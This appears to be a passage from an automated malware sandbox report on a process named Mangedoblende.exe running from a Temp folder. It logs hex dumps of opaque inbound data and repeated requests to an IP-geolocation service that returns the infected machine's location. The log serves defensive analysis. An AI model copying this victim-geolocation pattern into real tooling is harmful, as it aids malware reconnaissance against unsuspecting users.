                                                                                                                                                                          2025-01-10 18:17:29 UTC4953INData Raw: 9b 05 27 cc 72 98 aa 60 a7 1b 10 5c 31 f5 0f 7c 36 d1 95 5b f7 e4 b2 bc 22 9d b1 5b 2f e4 41 2c 28 5a 99 e7 3e ed 62 00 c5 4b c6 84 77 aa f9 76 d2 bd 54 2e ad 55 36 b1 21 4f 9e 7f e6 0b a4 91 10 2f 42 4c 2f f7 df 32 09 da 9b bb ce 16 81 75 a7 94 f2 1c 01 c3 6e bb f4 59 62 b0 e4 21 b9 16 35 96 dc c5 31 06 ed 87 6c 5a bd 9a 77 b6 86 44 7e c2 60 df 44 50 4d 1e f9 0d 4f eb 78 a2 fb dc 22 18 3e db f1 a8 cd 21 c8 cf 41 20 fd 09 81 cb 18 96 84 e5 a5 10 af 33 50 7c c0 da 33 0c 69 24 f1 b9 39 a0 a9 37 53 eb 67 52 d0 79 dd 02 9d 62 a9 8c 82 5f 99 ee 50 7e 55 af 9c c3 68 3e da 99 d3 f0 76 d7 16 55 72 fe f0 87 f6 e6 79 1f 8b c7 12 73 44 af 6d 6b 12 c1 40 03 4a 3a 38 4a 2d 68 73 e3 b7 05 77 7b 9f 58 32 cc 8b 92 86 ad 3f f1 f6 a6 ed 9c a7 c1 eb 2e e4 31 e3 55 01 41 e6
                                                                                                                                                                          Data Ascii: 'r`\1|6["[/A,(Z>bKwvT.U6!O/BL/2unYb!51lZwD~`DPMOx">!A 3P|3i$97SgRyb_P~Uh>vUrysDmk@J:8J-hsw{X2?.1UA
                                                                                                                                                                          2025-01-10 18:17:29 UTC4793INData Raw: 7f 95 38 4a 61 90 3f 26 b8 2b b3 3f 33 d3 2b 98 88 f0 b5 1a 2f 81 cc f0 de 75 3e 9a e0 82 f9 5e 83 45 de e0 98 87 99 76 f3 e9 89 28 ae 6e c5 e1 64 cc 32 91 d4 c7 14 3b 0b 2a 41 db 96 51 57 67 70 6b 10 a9 ac 2b ca c4 c1 66 54 af 4a f8 3e b6 86 34 20 7e 77 6f 9f d4 41 76 00 ce 39 37 ce d5 09 7f f5 e3 6b ab e0 8b b9 d1 19 24 dc 2d 88 9d 29 9a 00 71 96 a9 1c a6 69 4c 84 7d 27 d0 15 e3 51 2f 50 a4 4c 03 9e 06 1b 92 ba f6 55 cc 33 cf 5f 04 8f 07 ad 42 65 0a 74 eb 6b 7c b1 e2 16 c4 94 e9 04 41 36 08 fb a7 3f b3 4c 8f 55 ff db aa 16 45 77 33 9a fc 91 15 41 a1 15 c7 d9 bd 98 46 a7 67 b0 6c b0 7a ed a5 45 82 46 43 88 9a 4e 35 0d 93 0a 58 19 d0 90 ee d1 6e 50 65 62 5c b1 d8 22 85 bf 51 3d c8 ae 59 5e 7f db 73 33 5f ce f7 de ac 9a 57 53 c4 6c 19 1d de c0 3a 49 aa ab
                                                                                                                                                                          Data Ascii: 8Ja?&+?3+/u>^Ev(nd2;*AQWgpk+fTJ>4 ~woAv97k$-)qiL}'Q/PLU3_Betk|A6?LUEw3AFglzEFCN5XnPeb\"Q=Y^s3_WSl:I
                                                                                                                                                                          2025-01-10 18:17:29 UTC1323INData Raw: e3 a1 97 9a 88 d3 82 8f ba d2 11 42 93 22 3a 42 ef 13 b5 93 6f 46 1e 01 a7 18 69 a5 b8 18 66 e6 f1 96 3d 50 b6 e6 30 1b 11 ee 06 86 5c 98 07 02 28 0c 6e 14 0b 06 cd 54 c5 75 28 39 98 2c 67 ee 52 7a e0 ad 32 16 9d 69 68 df e4 45 89 c2 96 41 be c9 49 64 9e e8 08 b6 98 0e 5a ac 60 42 8b 76 34 96 f1 57 f8 26 f8 0b e4 15 68 35 e5 d4 9a fe a2 e7 14 f0 13 49 6a d7 f3 1a 68 88 1c 0f fc 0a 5c 49 3b a1 2f 3b cf 0a 00 f9 de 45 0d 6a 98 5e 0a d3 6a 38 12 f0 53 70 b3 ba e6 0c 5e 82 db 20 4f aa e5 51 43 5a 5d 2b 7e 87 19 4d 0f 6a a2 d9 03 ba d7 35 54 ac d0 dc 65 37 84 70 26 f0 4f 23 d0 d2 3d a8 fb 01 3d 7a d3 71 da 13 f3 73 8e b9 9e 61 ce 71 50 57 a1 7e bc c1 92 ea 3f eb 61 0a 42 21 6b 4c 01 04 7c 85 51 52 7b 82 60 fa 7b b3 01 0c e0 e8 4e 18 9a 74 a5 bc 5f af f2 d2 3a
                                                                                                                                                                          Data Ascii: B":BoFif=P0\(nTu(9,gRz2ihEAIdZ`Bv4W&h5Ijh\I;/;Ej^j8Sp^ OQCZ]+~Mj5Te7p&O#==zqsaqPW~?aB!kL|QR{`{Nt_:
                                                                                                                                                                          2025-01-10 18:17:29 UTC1390INData Raw: 7f 04 81 ce 33 3e b7 77 08 6c df 9d 2f 92 2e 81 b9 d6 2e 6e 51 72 82 80 a5 b5 65 71 97 86 0a d3 23 2c e2 0d 85 ff 05 a4 82 2f 50 a4 81 4e 86 74 76 91 ba f5 9e e9 2a bb 74 00 8f 12 0b 6f 68 0b 95 e4 6b 06 00 c2 0d ab bb 9a 6f 45 94 27 f4 d3 b7 ba 4e 90 9b d7 ae a0 16 91 16 6f 8b fa b7 0e 71 bc f7 86 d9 bd 93 63 6d 04 47 11 dd 0a 4f 8a 5f 74 fc 43 99 95 c0 18 04 e4 02 56 19 a0 38 cb 14 ce 66 65 73 5c 3f f5 29 f3 e1 53 3d b8 06 71 f7 76 f3 17 20 7d d2 d5 76 a0 9a 5a 7f e3 6b 7a 1c de e8 47 49 76 a7 38 de 25 94 fe 76 80 5d e2 69 aa 63 da 19 06 8b 0f e3 7b b1 d3 99 d7 a4 96 89 a8 3e 43 93 26 18 7c 33 cd a0 b6 99 62 3b 29 99 0b 6c af 83 59 66 ce 99 4b 63 5c 68 e6 30 1b 11 ee 03 86 5c 98 07 02 28 0c 6e 14 0b 06 cd 54 c5 75 28 39 98 0e 67 cc 47 e5 ff 20 72 68 b2
                                                                                                                                                                          Data Ascii: 3>wl/..nQreq#,/PNtv*tohkoE'NoqcmGO_tCV8fes\?)S=qv }vZkzGIv8%v]ic{>C&|3b;)lYfKc\h0\(nTu(9gG rh
                                                                                                                                                                          2025-01-10 18:17:29 UTC1390INData Raw: 54 1d 9d 58 69 9d c6 3e 1d 4f 48 11 fb 3e 0a 9a b7 b3 2c e4 ef 5e 24 b6 ce 44 86 d0 91 0d 68 28 7d 10 32 17 c2 b9 2b b9 5e fb d3 2b 92 88 8e 9e 18 2f 85 bf b0 df 75 34 92 e7 93 ff f9 53 45 de e4 89 80 f6 a5 f3 e9 83 28 d0 52 c5 e0 60 bf fb 46 d5 cd 07 eb 74 1b 41 cb 92 23 c2 20 70 1b 07 9a 1d 28 ca 7f d7 98 55 af 43 e9 26 9a 8a 0d 4b 69 18 af 94 d3 63 2c 00 e5 38 34 b0 81 1f 10 35 8c 0f a1 e0 81 a8 de 78 0a 51 72 8c b5 e3 f5 65 7b f9 6f 1c a1 64 23 f3 75 59 e0 12 8c 32 51 6b ae 23 6f ed ba 11 9e b0 ea f1 cc 33 cf 4c 11 87 07 af 25 bc 79 1e e1 6b 67 a4 88 d9 d5 91 90 6f 69 52 02 e8 a7 2e 6b 5e c5 11 cb db a0 1c 88 73 33 a3 98 bd 1d 5a 79 7a c6 d9 bd ec 73 7b 76 b0 71 48 78 ed df 5e 74 c9 43 99 95 74 c3 1d 85 6e 48 12 e9 51 ef 0d b0 20 4e 73 58 99 f8 d8 81
                                                                                                                                                                          Data Ascii: TXi>OH>,^$Dh(}2+^+/u4SE(R`FtA# p(UC&Kic,845xQre{od#uY2Qk#o3L%ykgoiR.k^s3Zyzs{vqHx^tCtnHQ NsX
                                                                                                                                                                          2025-01-10 18:17:29 UTC1390INData Raw: a6 79 5a d8 e8 76 6b b5 40 20 ab de 1f 58 bd 53 dc 5c cb ce 8f 6f 0b b2 bf c5 70 9b d6 1b da 14 b5 9e 83 30 12 60 1f e0 7c e4 0e 8b c7 78 37 9a c7 e6 f1 12 7d 12 4c f9 f3 2b cb 02 6b 30 a8 77 af d1 ac 35 86 11 16 67 ac 64 29 37 2b e0 2f 80 3a e2 27 d4 3a 39 fd 26 0e 9f b6 42 3c 00 09 58 84 36 63 00 28 6c 56 ad 65 ce 4b 1f 75 0d 1e bc 54 47 c9 aa af 54 6d 35 0f 59 a0 72 4e 35 1e ea 34 e9 32 26 95 b7 c7 a6 8b f6 20 16 c8 d1 40 24 f1 a3 35 95 38 77 c2 84 2b a3 91 91 b3 31 39 a7 a8 98 88 f1 b9 18 27 f3 a5 4d df 05 51 3a e0 82 f3 96 8a 3b 9c ee 98 83 e7 35 f3 e9 8d 5b 12 6e c5 ea 0b 71 32 46 df c7 3c b9 0a 2a 4b d6 1b 11 57 22 71 4e 07 c0 87 3d ca 05 63 43 43 94 fe f8 2f bc 24 39 5b 0c 10 6a 94 a3 cb 09 19 b0 0b 34 a1 8d ab 5a e5 fe 84 a4 e0 f1 1b f3 1d 4a 4d
                                                                                                                                                                          Data Ascii: yZvk@ XS\op0`|x7}L+k0w5gd)7+/:':9&B<X6c(lVeKuTGTm5YrN542& @$58w+19'MQ:;5[nq2F<*KW"qN=cCC/$9[j4ZJM
                                                                                                                                                                          2025-01-10 18:17:29 UTC1390INData Raw: 20 af 42 f6 34 ce 42 ce f0 fc 2b ad 90 f4 74 71 a5 8f df 79 22 b5 e2 83 b5 7c c4 47 45 6d 91 82 02 66 8a 79 0e 91 a8 b8 73 44 a5 8d 7a 0b af 90 02 1a 30 38 6e 11 ab 73 f7 b7 05 77 6d b7 2e 0c 8f 85 92 a6 8d 33 f1 f6 ee 9e 9c a7 cb ab 32 69 51 e3 55 00 66 f0 3e d3 52 2e 5c ac 16 cb 0c ff bc 30 74 13 f6 28 eb 3d 3e f9 9c 6f 61 92 fc 73 f9 a3 f0 53 94 58 5c 43 ac a2 7e 61 9a e2 03 9b b7 38 43 bd e7 79 79 d0 f5 02 2f 1a b2 c0 fc 66 e9 4b 64 34 64 17 b1 e6 42 a7 60 6f fc f6 40 16 f9 5c 7b c9 e9 6f c5 d1 98 ce 12 4c 8d 62 0e d1 74 6a b7 aa 07 7d ef f1 b4 86 1b be 59 27 65 22 3a 01 da 5c 59 2f f6 87 ff 25 39 fc 0a 0b d6 b6 48 44 59 de 4a f4 51 c6 41 28 6c 51 99 6d a1 1b 37 31 09 36 be 54 9a 4e c4 16 54 48 17 49 7e b5 78 2d 02 45 c2 56 e3 4c 67 4b b7 c3 8e c1 f6
                                                                                                                                                                          Data Ascii: B4B+tqy"|GEmfysDz08nswm.32iQUf>R.\0t(=>oasSX\C~a8Cyy/fKd4dB`o@\{oLbtj}Y'e":\Y/%9HDYJQA(lQm716TNTHI~x-EVLgK
                                                                                                                                                                          2025-01-10 18:17:29 UTC1390INData Raw: f6 0e 2f e7 36 4f ff e3 a4 40 25 95 32 2b d2 4c 26 f7 d6 5d a7 da 9b b1 31 37 8d 75 16 b8 f5 15 6e c2 6e bb be 59 be 6e f7 04 91 22 35 96 d6 d6 35 06 c5 e5 6c 5a b7 47 14 b0 86 44 7e c2 60 a1 76 50 4d 1a 8b 98 4d eb 88 b4 d3 5d 2c 07 8e c3 0f 1d d7 e9 f8 72 79 a6 32 28 d5 dd 5e e5 a4 91 a5 0c d8 41 41 07 c8 38 52 62 0d 5d 7b 98 48 c3 98 43 1f b5 46 3b be 59 8d b3 c8 7f c4 e3 e0 49 77 e3 5d 7e 59 6e 9c c3 62 3e a9 5b 83 b5 7c c4 5d 45 76 80 13 02 66 84 0a dc 8b c7 18 1c 80 af 8d 61 10 d1 4c 6d df 3a 38 64 57 55 73 f7 b3 6a b1 7b 9f 52 0c 9e 88 e0 1f 9d 3f 81 de 72 e9 9c ad b3 04 3e e4 61 cb 0e 01 43 ec 23 b2 59 2e 26 84 46 cc 11 74 5e 15 63 6c 96 3e 99 02 8a dc f4 bf af 94 d4 b7 d1 e3 fa f1 b7 e2 0b 3d dd e4 0e c3 bb 59 58 b9 c5 2f 55 1f b2 c1 2e fa ed 8f
                                                                                                                                                                          Data Ascii: /6O@%2+L&]17unnYn"55lZGD~`vPMM],ry2(^AA8Rb]{HCF;YIw]~Ynb>[|]EvfaLm:8dWUsj{R?r>aC#Y.&Ft^cl>=YX/U.
                                                                                                                                                                          2025-01-10 18:17:29 UTC1390INData Raw: ea 50 6a fc 8b 6d 5d ef 32 b8 0d 48 2c 18 9a 38 0e 54 6c 72 41 90 59 5f 1c e1 19 df 12 79 38 4a 5c 0a e9 93 cf 74 66 72 ca f1 b7 f2 37 c1 57 34 0d 7f 56 1f 70 f2 4a c4 05 0e 40 5a f4 60 c3 e8 d9 14 42 13 c7 6a e3 69 11 65 e8 a3 96 9d af e6 1c 3c 80 30 5e 63 da 17 2b 6f bb 6a 2c b3 7c e0 9a 90 39 d6 7b a7 cd 6f 69 86 87 6a 5f a7 22 99 5d 5e c7 7d 8f 93 b1 0f e7 30 42 f6 c3 c5 48 ab f6 5d 75 ac 73 2c f7 db 23 2f a8 e2 ac 31 99 ff 6a 1f 94 f6 34 48 c3 6e b1 a5 7a 1c f0 e4 21 bd 3e 0b 96 dc c3 31 d8 fd a2 44 6e bd 9a 7d a5 a2 44 56 a0 60 df 4e 8e 4d 1e f9 0d 31 dc f8 a2 ff ae b9 05 84 a5 e7 34 45 ec e9 7d 56 92 31 3b f0 b2 54 c9 f8 88 5a 3f c8 41 30 34 f6 cb 69 74 07 3b 27 bc 4c ed 3d 45 26 8f e5 1e a6 2b fe 42 ce 32 66 c6 ff 44 8f e3 5d 70 d3 8a 86 b1 59 3d
                                                                                                                                                                          Data Ascii: Pjm]2H,8TlrAY_y8J\tfr7W4VpJ@Z`Bjie<0^c+oj,|9{oij_"]^}0BH]us,#/1j4Hnz!>1Dn}DV`NM14E}V1;TZ?A04it;'L=E&+B2fD]pY=
                                                                                                                                                                          2025-01-10 18:17:29 UTC1390INData Raw: c6 52 a4 a5 28 67 60 ea e5 98 b1 29 6e 9f a2 19 59 12 9f a4 a8 73 bd 52 77 1b 56 03 09 a5 8a 0c 7a 00 eb 84 8d 2e 71 31 02 e7 20 5e a4 6a 63 81 d1 90 88 78 e2 8b 6b d6 4c e5 a6 87 34 20 f8 91 63 92 2a ba 50 9c 24 7e c8 55 b1 66 57 aa 32 61 d3 f8 23 28 37 ab f7 97 85 df 76 d4 ea a8 25 f4 ea 2a 61 ba 24 a2 2d 83 42 ae 5e fd 20 65 eb 3a e6 58 a6 e2 54 23 68 fb d4 bf 67 ff c0 39 d9 6a 6f 4e 68 38 17 c9 2a 54 72 41 94 fb 04 33 93 28 d8 60 9c 98 6f 37 62 e1 12 cf 70 ce 41 28 82 e3 f0 26 a5 cc e7 79 7f 56 08 92 ee 4a c4 0e 38 74 33 42 36 c3 98 7a 14 43 49 2a 7d e3 13 11 65 e7 f9 45 92 af 9c 1c 3c 81 3c 01 6c da 63 2b 6f b8 66 25 b0 7c 94 9a 90 38 da 6a a4 cd 1b 69 8b ee 18 18 bb 31 ca e9 5e c4 7d 8f 93 a2 3a 99 0a 42 f6 ef c0 79 ba fc 2d 63 fa cd 2c f7 d5 24 f3
                                                                                                                                                                          Data Ascii: R(g`)nYsRwVz.q1 ^jcxkL4 c*P$~UfW2a#(7v%*a$-B^ e:XT#hg9joNh8*TrA3(`o7bpA(&yVJ8t3B6zCI*}eE<<lc+of%|8ji1^}:By-c,$


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          2192.168.2.549947104.21.96.14431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:31 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-01-10 18:17:32 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:32 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 1847841
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fpsUJ%2BzJmzCHgkkF4XD%2FxxmcbU%2BqvKY%2BFKhDOK0GKqG9NoXQGLqSeg7oLivFgu6KNyn3me55la5xHl9xvGPcc2jTQyxUqxZlZZnJa9hCxjgtDHrc7cjoN5yJHdueidvMt8JNDUmd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8ffeaa171c1f42c0-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1600&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1777236&cwnd=212&unsent_bytes=0&cid=d6a9d8c07dac082e&ts=160&x=0"
                                                                                                                                                                          2025-01-10 18:17:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          3192.168.2.549955104.21.96.14431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:32 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          2025-01-10 18:17:33 UTC866INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:32 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 1847842
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k0T1X8fOFjswddGdjNs%2B2Abee8%2FxxlXZAcnoO%2BPl6cNlDFXgaRbni5%2FquexeNBmMPytHVj9zJLdgdEKNs2ZVu73BRT0rHJKhnOd5t%2F87flri722KN9r1%2FZ33Bmi%2BQGQWYK09dwjr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8ffeaa1d0b50c32e-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=34465&min_rtt=1570&rtt_var=20145&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1859872&cwnd=178&unsent_bytes=0&cid=f99be04664c542b6&ts=169&x=0"
                                                                                                                                                                          2025-01-10 18:17:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          4192.168.2.549969104.21.96.14431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:35 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          2025-01-10 18:17:35 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:35 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 1847844
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zH4yU0iOUWxLAhZLLa4haJnAY0EJxSucTLEE6ZETJpmjMBcEsmTysh8kkLPvmuBwRYD6hTFlNlge8bMauqsgvBq1dFdQnbSCrFoT4muNbduHSWb%2FEm3ArJNa4V7j6wDFjtMAF7eq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8ffeaa2a5ccf42c0-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1690&rtt_var=637&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1727810&cwnd=212&unsent_bytes=0&cid=154c52fd0db34dc3&ts=148&x=0"
                                                                                                                                                                          2025-01-10 18:17:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          5192.168.2.549977104.21.96.14431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:36 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-01-10 18:17:36 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:36 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 1847845
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DznHkgULEuRChufuwDIQwCL%2F6xICB4%2FXVuSlq5PANbtabuoA7xRgX6z5ZKVMpv8aLoO66FIMUjJtMOpsIsxw5pKJBi3t0b%2FctU0%2FTr4whEmUtXxQqWmD63YqHSNuZJrQBQLIGQs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8ffeaa331fea42c0-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1793&rtt_var=708&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1628555&cwnd=212&unsent_bytes=0&cid=ea73b5650b805e79&ts=135&x=0"
                                                                                                                                                                          2025-01-10 18:17:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          6192.168.2.549988104.21.96.14431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:37 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-01-10 18:17:38 UTC853INHTTP/1.1 200 OK
